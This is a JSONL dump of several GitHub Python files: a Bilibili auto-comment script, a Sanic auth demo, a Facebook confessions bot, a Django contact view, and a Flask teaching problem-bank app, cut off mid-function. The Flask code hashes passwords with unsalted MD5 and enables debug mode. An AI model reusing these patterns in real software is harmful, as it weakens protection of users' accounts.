每次刷新网页的时间/可以不变\n 'roomid': self.roomid, # 改变roomid可以改变不同主播的房间\n }\n\n # 发射弹幕post方法\n requests.post(\n self.url_2,\n data=form_2,\n headers=self.header,\n cookies=self.cookie)\n\n # 弹幕每隔5秒才能继续, bilibili规定\n time.sleep(random.randint(6, 10))\n","repo_name":"qq34384878/Spider","sub_path":"chushou/bilibili.py","file_name":"bilibili.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24505958671","text":"from sanic import Sanic\nfrom sanic.response import json\n\nfrom auth import protected\nfrom login import login\n\n\napp = Sanic(\"AuthApp\")\napp.config.SECRET = \"KEEP_IT_SECRET_KEEP_IT_SAFE\"\napp.blueprint(login)\n\n\n@app.get(\"/\")\nasync def hello_world(request):\n return json({\"msg\": \"Hello, world.\"})\n\n\n@app.get(\"/secret\")\n@protected\nasync def secret(request):\n return json({\"msg\": \"To go fast, you must be fast.\"})\n\n","repo_name":"defnngj/learning-API-test","sub_path":"sanic_app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"81"} +{"seq_id":"37411669533","text":"import re\nimport requests\nimport json\nfrom urllib.parse import urljoin\nfrom util import *\nfrom database import Page, Confession\nfrom flask import url_for\nimport urllib\n\nBASE_URL = \"https://graph.facebook.com/v2.9/\"\nFB_URL = \"https://www.facebook.com/\"\nPAGE_ACCESS_TOKEN = os.environ[\"PAGE_ACCESS_TOKEN\"]\nCLIENT_SECRET = os.environ[\"CLIENT_SECRET\"]\nAPP_ID = os.environ[\"APP_ID\"]\n\n\ndef makeRequest(endpoint, method=\"GET\", access_token=None, **parameters):\n url = urljoin(BASE_URL, endpoint)\n if access_token:\n parameters['access_token'] = access_token\n\n if method == \"GET\":\n r = requests.get(url, params=parameters)\n elif method == \"POST\":\n r = requests.post(url, data=parameters)\n else:\n raise RuntimeError(\"Unknown request method: \" + str(method))\n if r.status_code == 200:\n debug(\"Url: \" + str(url))\n debug(\"Params: \" + str(parameters))\n printCap = 640\n printText = str(r.text)[:printCap]\n if len(r.text) > printCap:\n printText += \" ...\"\n debug(\"Response: \" + printText)\n return json.loads(r.text)\n else:\n log(\"Failed to query {}\".format(url))\n log(\"with params: \" + str(parameters))\n log(r.text)\n return None\n\n\ndef queryFacebook(endpoint, accessToken, fields, **parameters):\n return makeRequest(endpoint, access_token=accessToken, fields=\",\".join(fields), **parameters)\n\n\ndef postFacebook(endpoint, accessToken, **parameters):\n return makeRequest(endpoint, method=\"POST\", access_token=accessToken, **parameters)\n\n\ndef getClientTokenFromCode(sender, code):\n redirect = loginRedirectURI()\n data = makeRequest(\"oauth/access_token\", client_id=APP_ID, redirect_uri=redirect, state=sender, client_secret=CLIENT_SECRET, code=code)\n if not data:\n return None\n\n return data.get(\"access_token\")\n\n\ndef listManagedPages(clientToken):\n # TODO: paging if needed by someone\n response = queryFacebook(\"me/accounts\", clientToken, [\"access_token\", \"name\", \"id\"])\n if response:\n return response.get(\"data\")\n return None\n\n\ndef getPageProfilePictureUrl(pageID, clientToken):\n response = queryFacebook(str(pageID) + \"/picture\", clientToken, [], redirect=\"false\")\n if response:\n return response[\"data\"].get(\"url\")\n\n\ndef objectUrl(pageID):\n return urljoin(FB_URL, str(pageID))\n\npageUrl = objectUrl\npostUrl = objectUrl\n\n\ndef loginUrl(sender, scopes):\n url = \"https://www.facebook.com/v2.9/dialog/oauth\"\n redirectURI = urllib.parse.quote(loginRedirectURI())\n url += \"?redirect_uri={}&client_id={}&scope={}\".format(redirectURI, APP_ID, scopes)\n url += \"&state={}\".format(str(sender))\n log(\"Login URL: \" + url)\n return url\n\n\ndef loginRedirectURI():\n return url_for(\"login_redirect\", _external=True)\n\n\nclass FBObject:\n def __init__(self, id):\n self.id = id\n self.token = None\n\n def query(self, endpoint=\"\", fields=list(), **parameters):\n return queryFacebook(str(self.id) + \"/\" + endpoint, self.token, fields, **parameters)\n\n def post(self, endpoint=\"\", **parameters):\n return postFacebook(str(self.id) + \"/\" + endpoint, self.token, **parameters)\n\n\nclass FBPost(FBObject):\n def __init__(self, id, text=None, token=None):\n super().__init__(id)\n self.text = text\n self.token = token\n\n def fetchText(self):\n response = self.query()\n log(response)\n if response:\n self.text = response.get(\"message\")\n return self.text is not None\n\n def getIndex(self):\n if not self.text:\n status = self.fetchText()\n if not status:\n return None\n\n result = re.search(r'^\\#(\\d+)\\s', self.text)\n if result:\n index = result.group(1)\n return int(index)\n\n def addComment(self, message):\n response = self.post(\"comments\", message=message)\n if response:\n return response.get(\"id\")\n\n\nclass FBPage(FBObject):\n def __init__(self, page):\n super().__init__(page.fb_id)\n self.token = page.token\n\n def getName(self):\n data = self.query()\n if data:\n return data.get(\"name\")\n\n def getProfilePictureUrl(self):\n data = self.query(\"picture\", redirect=False)\n if data:\n return data[\"data\"].get(\"url\")\n\n def getCoverPictureUrl(self):\n data = self.query(fields=[\"cover\"],)\n if data:\n cover = data.get(\"cover\")\n if cover:\n return cover.get(\"source\")\n\n def getRecentPosts(self):\n data = self.query(\"posts\", limit=10)\n if data:\n posts = list()\n for postData in data.get(\"data\"):\n if \"message\" in postData:\n post = FBPost(postData[\"id\"], postData[\"message\"])\n posts.append(post)\n return posts\n\n def getLastConfessionIndex(self):\n posts = self.getRecentPosts()\n if posts:\n for post in posts:\n index = post.getIndex()\n if index:\n return index\n\n def postConfession(self, confession):\n referencedConfession = confession.getReferencedConfession()\n if not referencedConfession:\n lastIndex = self.getLastConfessionIndex()\n debug(\"Last index: \" + str(lastIndex))\n if lastIndex:\n index = lastIndex + 1\n else:\n index = Confession.getLastIndex(self.id) + 1\n\n message = \"#{} {}\".format(str(index), confession.text)\n response = self.post(\"feed\", message=message)\n if response:\n return response.get(\"id\"), index\n else:\n post = FBPost(referencedConfession.fb_id, token=self.token)\n id = post.addComment(confession.text)\n if id:\n return id, None\n\n\n","repo_name":"JoeyDP/Confessions-Bot","sub_path":"facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"602137248","text":"from django.shortcuts import render, HttpResponse\nfrom contact.models import Contact\nfrom django.contrib import messages\n\n# Create your views here.\n\n\ndef contact(request):\n messages.success(request, 'Welcome to Contact')\n if request.method=='POST':\n name = request.POST['name']\n email = request.POST['email']\n ph_num = request.POST['ph_num']\n message = request.POST['message']\n description = request.POST['description']\n contact = Contact(name=name, email=email, ph_num=ph_num, message=message, description=description)\n return render(request, 'contact.html')\n\n","repo_name":"eLearnInstitute/eLearn-Web","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38519771821","text":"# coding=utf8\n\ndef parse_person_name(name):\n tokens = name.strip().split()\n if len(tokens) == 2:\n return tokens[0],tokens[1],None\n if len(tokens) == 1:\n return tokens[0],None,None\n if tokens[1][-3:] in ['вна', 'вич']:\n return tokens[0],tokens[2],tokens[1]\n return tokens[1],tokens[0],tokens[2]\n\nimport re\n\ndef process_problem_variations_mathmode(text, variation = None):\n return re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).sub(lambda m:\\\n ''.join(r'\\class{problem-variation-' + str(i) + '}{ ' + opt + ' } ' for i, opt in enumerate(m.group(1).split('||')))\\\n , text)\n\ndef process_problem_variations_textmode(text, variation = None):\n return re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).sub(lambda m:\\\n ''.join(r'<span class=\"problem-variation-{0}\">{1}</span>'.format(i, opt) for i, opt in enumerate(m.group(1).split('||')))\\\n , text)\n\ndef gcd(x, y):\n if x % y == 0:\n return y\n if y % x == 0:\n return x\n return gcd(min(x, y), max(x, y) % min(x, y))\n\ndef lcm(seq):\n cur_lcm = 1\n for k in seq:\n cur_lcm = k * cur_lcm // gcd(k, cur_lcm)\n return cur_lcm\n\ndef process_problem_variations(text, variation = None):\n if variation is not None:\n def variation_chooser(match_object):\n options = match_object.group(1).split('||')\n return options[variation % len(options)]\n return re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).sub(variation_chooser, text)\n\n num_variations = list(set(len(s.split('||')) for s in re.compile(r'\\{\\{(.*?)\\}\\}', re.DOTALL).findall(text)))\n text = re.compile(r'\\$\\$(.*?)\\$\\$', re.DOTALL).sub(lambda m: r'$${0}$$'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = re.compile(r'\\$(.*?)\\$', re.DOTALL).sub(lambda m: r'${0}$'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = re.compile(r'\\\\\\((.*?)\\\\\\)', re.DOTALL).sub(lambda m: r'\\({0}\\)'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = re.compile(r'\\\\\\[(.*?)\\\\\\]', re.DOTALL).sub(lambda m: r'\\[{0}\\]'.format(process_problem_variations_mathmode(m.group(1)), variation), text)\n text = process_problem_variations_textmode(text, variation)\n\n if (variation is not None) or len(num_variations) == 0:\n return text\n\n max_variations = max(num_variations)\n if max_variations <= 1:\n return text\n\n buttons_html = '\\n'.join('''\n <button\n class=\"problem-variation-control btn btn-default\"\n data-variation=\"{0}\"\n onclick=\"\n for(var i = 0; i < {1}; ++i) {{\n $(event.target).parent().parent().find('.problem-variation-' + i.toString()).hide(0);\n }}\n $(event.target).parent().parent().find('.problem-variation-' + event.target.dataset.variation).css('display','inline');\n \">{0}</button>'''.replace('\\n','').\\\n format(i, max_variations) for i in range(lcm(num_variations)))\n\n return r'<div class=\"dontprint\">Вариация {0}</div>{1}'.format(buttons_html, text)\n\n\ndef process_latex_lists(text):\n def shuffler(s):\n s = s.split(r'\\item')[1:]\n random.shuffle(s)\n return r'\\begin{itemize} \\item' + r' \\item '.join(s) + r'\\end{itemize}'\n text = re.compile(r'\\\\begin{shuffledlist}(.*?)\\\\end{shuffledlist}', re.DOTALL).sub(lambda m: shuffler(m.group(1)), text)\n\n return text\\\n .replace(r'\\begin{enumerate}','<ol>')\\\n .replace(r'\\end{enumerate}','</ol>')\\\n .replace(r'\\begin{itemize}','<ul>')\\\n .replace(r'\\end{itemize}','</ul>')\\\n .replace(r'\\item','<li>')\n\ndef process_xypic_macros(text):\n return re.compile(r'\\\\edge{(.*?)}', re.DOTALL).sub(lambda m: r'\\ar@{{-}}[{0}]'.format(m.group(1)), text)\\\n .replace(r'\\vrtxf', r'*[o]{\\bullet}')\\\n .replace(r'\\vrtx', r'*[o]{\\circ}')\n\ndef latex_to_html(text, variation = None):\n text = re.compile(r'(?<!\\\\)%.*$', re.MULTILINE).sub('', text)\n text = escape(text)\n text = re.compile(r'\\\\emph{(.*?)}', re.DOTALL).sub(lambda m: r'<em>{0}</em>'.format(m.group(1)), text)\n text = re.compile(r'\\\\textit{(.*?)}', re.DOTALL).sub(lambda m: r'<em>{0}</em>'.format(m.group(1)), text)\n text = re.compile(r'\\\\textbf{(.*?)}', re.DOTALL).sub(lambda m: r'<strong>{0}</strong>'.format(m.group(1)), text)\n text = re.sub(r'\\\\,', ' ', text).replace('---','—').replace('--','–').replace('~',' ')\n\n text = process_latex_lists(text)\n text = process_problem_variations(text, variation)\n text = process_xypic_macros(text)\n\n return text\n\nfrom flask import Flask\nfrom flask import escape, render_template, request, redirect, url_for, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail, Message\nfrom datetime import datetime, date\nfrom collections import defaultdict\nimport random\nimport flask.ext.login as flask_login\n\n# Security sensitive constants are imported from a file not being synced with github\nfrom tpbeta_security import *\n\napp = Flask(__name__)\n\napp.secret_key = tpbeta_app_secret_key\n\napp.config['SQLALCHEMY_DATABASE_URI'] = tpbeta_sqlalchemy_db_uri\napp.config['SQLALCHEMY_POOL_RECYCLE'] = 280\n\napp.config['MAIL_SERVER'] = tpbeta_mail_server\napp.config['MAIL_PORT'] = tpbeta_mail_port\napp.config['MAIL_USERNAME'] = tpbeta_mail_username\napp.config['MAIL_PASSWORD'] = tpbeta_mail_password\napp.config['MAIL_DEFAULT_SENDER'] = tpbeta_mail_default_sender\napp.config['MAIL_USE_SSL'] = True\n\napp.debug = True\ndb = SQLAlchemy(app)\nmail = Mail(app)\n\nlogin_manager = flask_login.LoginManager()\nlogin_manager.init_app(app)\nteachers = tpbeta_teacher_usernames\n\n\n\nfrom hashlib import md5 as md5hasher\n\ndef md5(s):\n m = md5hasher()\n m.update(s.encode())\n return m.hexdigest()\n\nclass AcademicGroup(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n number = db.Column(db.Integer)\n year = db.Column(db.Integer)\n def __init__(self, number, year = None):\n self.number = number\n self.year = year\n\nclass User(db.Model, flask_login.UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique=True)\n pwdhash = db.Column(db.String(32))\n firstname = db.Column(db.Unicode(80))\n middlename = db.Column(db.Unicode(80))\n lastname = db.Column(db.Unicode(80))\n email = db.Column(db.Unicode(80))\n def __repr__(self):\n return '<User {0}>'.format(self.username)\n\nclass Learner(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), unique = True, nullable = False)\n academic_group = db.Column(db.Integer, db.ForeignKey('academic_group.id'))\n latex_project_url = db.Column(db.UnicodeText)\n\n # In case a student is visiting classes with a different group:\n academic_group_real = db.Column(db.Integer, db.ForeignKey('academic_group.id'))\n\n def __init__(self, username, email, names):\n self.username = username\n self.email = email\n\nclass ProblemSnapshot(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n problem_id = db.Column(db.Integer, db.ForeignKey('problem.id'), nullable = False)\n datetime = db.Column(db.DateTime, nullable = False)\n statement = db.Column(db.UnicodeText, nullable = False)\n\nclass ProblemComment(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n problem_id = db.Column(db.Integer, db.ForeignKey('problem.id'), nullable = False)\n datetime = db.Column(db.DateTime, nullable = False)\n text = db.Column(db.UnicodeText)\n author = db.Column(db.Integer, db.ForeignKey('user.id'), nullable = False)\n in_reply_to = db.Column(db.Integer)\n\nclass Problem(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.Text)\n statement = db.Column(db.UnicodeText, nullable = False)\n creator = db.Column(db.Integer, db.ForeignKey('user.id'))\n parent = db.Column(db.Integer)\n last_modified = db.Column(db.DateTime)\n clones = db.Column(db.Text)\n author_comment = db.Column(db.Text)\n topics = db.Column(db.Text)\n concepts = db.Column(db.Text)\n\nclass Topic(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n topic = db.Column(db.Text)\n level = db.Column(db.Integer)\n parent = db.Column(db.Integer)\n connected_topics = db.Column(db.Text)\n comment = db.Column(db.Text)\n\nclass Concept(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n concept = db.Column(db.Text)\n comment = db.Column(db.Text)\n\nclass History(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n datetime = db.Column(db.DateTime, nullable = False)\n user = db.Column(db.Integer, db.ForeignKey('user.id'))\n problem = db.Column(db.Integer, db.ForeignKey('problem.id'))\n event = db.Column(db.String(100))\n comment = db.Column(db.Text)\n\nclass TestLog(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n datetime = db.Column(db.DateTime)\n user = db.Column(db.Integer, db.ForeignKey('user.id'))\n test_number = db.Column(db.Integer)\n problems = db.Column(db.Text)\n\nclass Trajectory(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n topics = db.Column(db.Text)\n comment = db.Column(db.Text)\n\n@login_manager.user_loader\ndef user_loader(id):\n return User.query.filter_by(id = id).first()\n\n@login_manager.request_loader\ndef request_loader(request):\n user = User.query.filter_by(username = request.form.get('username')).first()\n if user is None:\n return\n\n user.is_authenticated = False\n if 'pw' in request.form and hasattr(user,'pwdhash') and md5(request.form['pw']) == user.pwdhash:\n user.is_authenticated = True\n\n return user\n\n@app.route('/add_user', methods=['GET','POST'])\n@flask_login.login_required\ndef calc_md5():\n if flask_login.current_user.username != tpbeta_superuser_username:\n return 'Only supervisor can add users.'\n\n if request.method == 'GET':\n return '''\n <form action='add_user' method='POST'>\n <input type='text' name='username' id='username' placeholder='логин'></input>\n <input type='text' name='name' id='name' placeholder='Фамилия Имя Отчество'></input>\n <input type='password' name='pw' id='pw' placeholder='предлагаемый пароль'></input>\n <input type='submit' name='submit'></input>\n </form>\n '''\n\n user = User.query.filter_by(username = request.form['username']).first()\n if user is not None:\n return 'Такой пользователь уже существует'\n\n u = User()\n u.username = request.form['username']\n u.firstname, u.lastname, u.middlename = parse_person_name(request.form['name'])\n u.pwdhash = md5(request.form['pw'])\n db.session.add(u)\n db.session.commit()\n\n return 'Пользователь {0} успешно добавлен'.format(u.username)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n already_logged = False\n login_successful = False\n bad_login = False\n username = ''\n if request.method == 'GET':\n if flask_login.current_user is not None and hasattr(flask_login.current_user, 'username'):\n already_logged = True\n username = flask_login.current_user.username\n else:\n user = User.query.filter_by(username = request.form['username']).first()\n if user is not None and hasattr(user, 'pwdhash') and md5(request.form['pw']) == user.pwdhash:\n flask_login.login_user(user)\n login_successful = True\n username = request.form['username']\n else:\n bad_login = True\n\n return render_template(\n 'login.html',\n already_logged = already_logged,\n login_successful = login_successful,\n bad_login = bad_login,\n username = username)\n\n@app.route('/logout')\ndef logout():\n flask_login.logout_user()\n return redirect(url_for('login'))\n\n@login_manager.unauthorized_handler\ndef unauthorized_handler():\n return redirect(url_for('login'))\n\n@app.route('/group/<int:group_number>/test/<int:test_number>/ajax_update', methods = ['POST'])\n@flask_login.login_required\ndef ajax_update_group_table(group_number, test_number):\n if flask_login.current_user.username not in teachers:\n return jsonify(result=\"You need to be logged in as a teacher to update test results\")\n\n data = {}\n for s in request.json:\n if s.startswith('learner'):\n data[int(s[len('learner'):])] = request.json[s].split(',')\n\n num_updated_items = 0\n num_added_items = 0\n result_translator = { '∅' : 'SEEN' , '□' : 'TRIED', '◩' : 'ALMOST', '■' : 'SUCCESS'}\n for log in TestLog.query.filter_by(test_number = test_number).all():\n if log.user in data:\n problem_numbers = map(int, log.problems.split(','))\n for n,r in zip(problem_numbers,data[log.user]):\n if r in result_translator:\n h = History.query.filter_by(problem = n, user = log.user, comment = 'TEST{0}'.format(test_number)).first()\n if h is None:\n h = History()\n if result_translator[r] == 'ALMOST':\n h.datetime = datetime.now()\n else:\n h.datetime = log.datetime or datetime(1,1,1)\n h.comment = 'TEST{0}'.format(test_number)\n h.user = log.user\n h.problem = n\n h.event = result_translator[r]\n db.session.add(h)\n num_added_items += 1\n elif h.event != result_translator[r]:\n h.event = result_translator[r]\n num_updated_items += 1\n\n db.session.commit()\n if num_added_items > 0 and num_updated_items > 0:\n return jsonify(result=\"Успешно добавлены {0} и обновлены {1} отметок\".format(num_added_items, num_updated_items))\n if num_updated_items > 0:\n return jsonify(result=\"Успешно обновлены {0} отметок\".format(num_updated_items))\n if num_added_items > 0:\n return jsonify(result=\"Успешно добавлены {0} отметок\".format(num_added_items))\n return jsonify(result=\"Нечего обновлять\")\n\n\n@app.route('/group/<int:group_number>/test/<int:test_number>/edit')\n@flask_login.login_required\ndef edit_group_table(group_number, test_number):\n if flask_login.current_user.username not in teachers:\n return \"Login required for this URL\"\n\n test_log_items = db.session.query(TestLog)\\\n .filter(TestLog.test_number == test_number)\\\n .join(Learner, Learner.user_id == TestLog.user)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n\n if len(test_log_items) == 0:\n return 'Похоже, тест с таким номером ещё не проводился: о нём нет информации в базе данных.'\n\n test_history = History.query.filter_by(comment='TEST{0}'.format(test_number))\\\n .join(Learner, Learner.user_id == History.user)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n\n items = []\n for log in test_log_items:\n u = User.query.filter_by(id = log.user).first()\n result_translator = {'SEEN' : '∅', 'TRIED' : '□', 'ALMOST' : '◩', 'SUCCESS' : '■'}\n u_history = {h.problem: result_translator[h.event] for h in test_history if h.user == u.id and h.event in result_translator}\n problem_ids = list(map(int, log.problems.split(',')))\n results = [''] * len(problem_ids)\n for i, p in enumerate(problem_ids):\n if p in u_history:\n results[i] = u_history[p]\n else:\n results[i] = str(problem_ids[i])\n items.append(dict(\n name = '{0} {1}'.format(u.lastname,u.firstname),\n id = u.id,\n marks = [\n { 'id': problem_ids[i],\n 'result': results[i]} for i in range(len(results))]))\n max_problems = max( len(x['marks']) for x in items )\n for x in items:\n if len(x['marks']) < max_problems:\n x['marks'] += [''] * (max_problems - len(x['marks']))\n\n return render_template(\n 'result_table_snippet.html',\n user = flask_login.current_user.username,\n group = group_number,\n test = test_number,\n student_results = items,\n problem_labels = list(range(1, max_problems+1)))\n\n@app.route('/problem/<int:problem_id>')\n@flask_login.login_required\ndef show_problem(problem_id):\n if flask_login.current_user.username not in teachers:\n if not db.session.query(History.id).filter(History.user == flask_login.current_user.id, History.problem == problem_id, History.event.in_(['SEEN', 'TRIED', 'ALMOST', 'SUCCESS'])).first():\n return 'Просматривать задачу могут только преподаватели либо ранее решавшие её студенты.'\n\n problem = Problem.query.filter_by(id=problem_id).first()\n if problem is None:\n return 'Задача с id {0} не найдена.'.format(problem_id)\n\n variation = None\n if request.args.get('variation'):\n variation = int(request.args.get('variation'))\n\n if flask_login.current_user.username in teachers:\n comments = ProblemComment.query.filter_by(problem_id=problem_id).all()\n else:\n comments = ProblemComment.query.filter(ProblemComment.problem_id==problem_id, ProblemComment.author.in_([1,1049,1050]+[flask_login.current_user.id])).all()\n\n comments_processed = []\n for c in sorted(comments, key=lambda x: x.datetime):\n comments_processed.append({\n 'text' : c.text,\n 'author' : db.session.query(User.username).filter(User.id == c.author).first()[0],\n 'datetime' : c.datetime.isoformat().replace('T', ' ')\n })\n\n return render_template('single_problem.html',\n problem_statement = latex_to_html(problem.statement, variation),\n comments = comments_processed,\n problem_id = problem_id)\n\n@app.route('/problem/<int:problem_id>/newcomment', methods = ['POST'])\n@flask_login.login_required\ndef new_problem_comment(problem_id):\n if flask_login.current_user.username not in teachers:\n if not db.session.query(History.id).filter(History.user == flask_login.current_user.id, History.problem == problem_id, History.event.in_(['SEEN', 'TRIED', 'ALMOST', 'SUCCESS'])).first():\n return jsonify(result='Комментировать задачу могут только преподаватели либо ранее решавшие её студенты.')\n\n c = ProblemComment()\n c.problem_id = problem_id\n c.datetime = datetime.now()\n c.text = request.json['comment'];\n c.author = flask_login.current_user.id\n db.session.add(c)\n db.session.commit()\n return jsonify(result='Комментарий успешно добавлен. Обновите страницу для отображения.');\n\n@app.route('/problems/<topic>')\n@flask_login.login_required\ndef show_problems(topic):\n if flask_login.current_user.username not in teachers:\n return 'Только преподаватели имеют доступ к этой странице'\n\n problems = None\n if topic == 'all':\n problems = Problem.query.all()\n show_filter_prompt = True\n else:\n show_filter_prompt = False\n if not topic.isdecimal():\n topic = db.session.query(Topic.id).filter(Topic.topic == topic).first()\n if topic:\n topic = str(topic[0])\n if topic:\n problems = Problem.query.filter_by(topics = topic).all()\n\n if problems is None:\n return 'Невозможно загрузить задачи для отображения'\n template_problems = []\n for p in problems:\n if p.topics and p.topics.split(',')[0] and p.topics.split(',')[0].isdecimal():\n t_id = int(p.topics.split(',')[0])\n topic = db.session.query(Topic.topic).filter(Topic.id==t_id).first()\n else:\n topic = ''\n if topic:\n topic = topic[0]\n else:\n topic = ''\n template_problems.append( {\n 'topic' : topic,\n 'edit_url' : url_for('edit_problem',problem_id=p.id),\n 'id' : p.id,\n 'statement' : latex_to_html(p.statement),\n 'clones' : p.clones })\n\n return render_template(\n 'multiple_problems.html',\n problems = template_problems,\n show_filter_prompt = show_filter_prompt)\n\n\n@app.route('/problem/new')\n@flask_login.login_required\ndef new_problem():\n if flask_login.current_user.username not in teachers:\n return \"Создавать задачи могут только преподаватели.\"\n\n existing_problem_id = db.session.query(Problem.id).filter(Problem.statement.like('(Условие задачи)%')).first()\n if existing_problem_id:\n return redirect(url_for('edit_problem',problem_id=existing_problem_id[0]))\n\n p = Problem()\n p.statement = '(Условие задачи)'\n p.creator = flask_login.current_user.id\n db.session.add(p)\n db.session.commit()\n return redirect(url_for('edit_problem',problem_id=p.id))\n\n\n@app.route('/problem/<int:problem_id>/edit')\n@flask_login.login_required\ndef edit_problem(problem_id):\n if flask_login.current_user.username not in teachers:\n return \"Login required for this URL\"\n\n p = Problem.query.filter_by(id=problem_id).first()\n if p is None:\n return 'Задача с id {0} не найдена.'.format(problem_id)\n if p.topics and p.topics.split(',')[0].isdecimal():\n topic = Topic.query.filter_by(id=int(p.topics.split(',')[0])).first().topic\n else:\n topic = ''\n\n return render_template('single_problem_edit.html',\n problem_statement=p.statement,\n problem_id = problem_id,\n topic = topic,\n clones = p.clones)\n\n@app.route('/problem/<int:problem_id>/update', methods = ['POST'])\n@flask_login.login_required\ndef update_problem(problem_id):\n if flask_login.current_user.username not in teachers:\n return jsonify(result=\"You need to be logged in as a teacher to update problem database\")\n\n p = Problem.query.filter_by(id=problem_id).first();\n p.statement = request.json['statement'];\n p.last_modified = datetime.now()\n clones = set(request.json['clones'].strip().split(','))\n if all(x.isdecimal() for x in clones):\n p.clones = ','.join(str(x) for x in sorted(int(y) for y in clones))\n else:\n p.clones = ''\n p.topics = ''\n if request.json['topic']:\n r = db.session.query(Topic.id).filter(Topic.topic==request.json['topic']).first()\n if r:\n p.topics = str(r[0])\n\n db.session.commit()\n\n return jsonify(result='Задача успешно обновлена.', processedText = latex_to_html(p.statement));\n\n\n@app.route('/trajectory/edit', methods=['GET','POST'])\n@flask_login.login_required\ndef edit_trajectory():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to update trajectory\"\n\n if request.method == 'GET':\n r = list(map(int, Trajectory.query.first().topics.split('|')))\n return render_template('trajectory.html', topics = [db.session.query(Topic.topic).filter(Topic.id==i).first()[0] for i in r])\n\n num_added_new_topics = 0\n if request.json['newtopics']:\n new_topic_names = request.json['newtopics'].split('|')\n for t in new_topic_names:\n if db.session.query(Topic.id).filter(Topic.topic==t).first() is None:\n topic = Topic()\n topic.topic = t\n db.session.add(topic)\n num_added_new_topics += 1\n\n topic_names = request.json['topics'].split('|')\n r = '|'.join(str(db.session.query(Topic.id).filter(Topic.topic==t).first()[0]) for t in topic_names)\n Trajectory.query.first().topics = r\n db.session.commit()\n\n if num_added_new_topics > 0:\n return jsonify(result='Траектория успешно обновлена; добавлено {0} новых тем.'.format(num_added_new_topics))\n return jsonify(result='Траектория успешно обновлена.')\n\n@app.route('/autocomplete/topics', methods=['GET'])\ndef autocomplete_topics():\n search = request.args.get('q')\n query = db.session.query(Topic.topic).filter(Topic.topic.like('%' + str(search) + '%'))\n return jsonify(matching_results=[itm[0] for itm in query.all()])\n\n@app.route('/latex_to_html', methods=['POST'])\n@flask_login.login_required\ndef preprocess_latex_text():\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher\"\n if request.json and 'text' in request.json and request.json['text']:\n return jsonify(result = latex_to_html(request.json['text']))\n return jsonify(result = '')\n\n\n@app.route('/test/view/<int:group_number>/<int:test_number>', methods=['GET','POST'])\n@flask_login.login_required\ndef view_test(group_number, test_number):\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to view tests\"\n\n users = db.session.query(User.id, User.firstname, User.lastname)\\\n .join(Learner, Learner.user_id == User.id)\\\n .join(AcademicGroup, Learner.academic_group == AcademicGroup.id)\\\n .filter(AcademicGroup.number == group_number)\\\n .all()\n if len(users) == 0:\n return 'Нет данных о студентах из группы {0}'.format(group_number)\n\n users = { u[0] : '{0} {1}'.format(u[1], u[2]) for u in users }\n\n testlog_items = TestLog.query.filter(TestLog.test_number == test_number, TestLog.user.in_(list(users))).all()\n if len(testlog_items) == 0:\n return 'Нет данных о тесте номер {0} ��руппы {1}'.format(test_number, group_number)\n\n test_date = testlog_items[0].datetime\n\n log_info = ''\n # if flask_login.current_user.username == tpbeta_superuser_username:\n # log_info = '; '.join(str(cid) + ' : ' + ','.join(str(t) for t in clones[cid]) for cid in clones)\n\n problem_sets = dict()\n\n for item in testlog_items:\n user_id = item.user\n user_problem_ids = list(map(int, item.problems.split(',')))\n user_problems = {p.id : p.statement for p in Problem.query.filter(Problem.id.in_(user_problem_ids)).all()}\n problem_sets[user_id] = [ {'id': id, 'text': latex_to_html(user_problems[id])} for id in user_problem_ids ]\n\n return render_template(\n 'test_printout.html',\n problems = problem_sets,\n users = users,\n group = group_number,\n suggested_test_number = test_number,\n date = test_date.isoformat()[:10],\n log_info = log_info,\n view_only = True)\n\n@app.route('/test/create/<int:group_number>', methods=['GET','POST'])\n@flask_login.login_required\ndef create_test(group_number):\n max_problems = int(request.args.get('max', 5))\n current_variation = defaultdict(int)\n\n if flask_login.current_user.username not in teachers:\n return \"You need to be logged in as a teacher to create tests\"\n\n if request.method == 'POST':\n if not request.json or 'test_number' not in request.json:\n return jsonify(result = 'Ошибка сохранения.')\n test_number = int(request.json['test_number'])\n test_date = datetime(*map(int, request.json['test_date'].split('-')))\n for s in request.json['problems'].split('|'):\n s_user, s_problems = s.split(':')\n if not s_user or db.session.query(TestLog.id).filter(TestLog.test_number == int(test_number), TestLog.user == int(s_user)).first():\n db.session.rollback()\n return jsonify(result = 'Ошибка: в базе данных уже есть запись о тесте {0} у пользователя #{1}'.format(test_number, s_user))\n testlog = TestLog()\n testlog.test_number = test_number\n testlog.datetime = 